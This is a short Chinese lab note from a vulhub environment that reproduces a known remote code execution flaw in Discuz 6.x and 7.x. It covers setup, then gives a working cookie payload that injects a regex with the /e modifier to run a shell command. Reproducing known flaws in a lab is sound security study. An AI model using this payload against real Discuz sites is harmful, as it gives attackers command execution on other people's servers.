1.漏洞复现
wooyun-2010-080723(vulhub)
影响范围:Discuz 6.x、7.x
访问 http://IP:8080/install/ 进行安装
数据库服务器填db,数据库用户名、密码填root
随便找一个帖子抓包,路径例:/viewthread.php?tid=13&extra=page%3D1
在Cookie中添加Payload进行RCE,Payload:
; GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=`ls`;
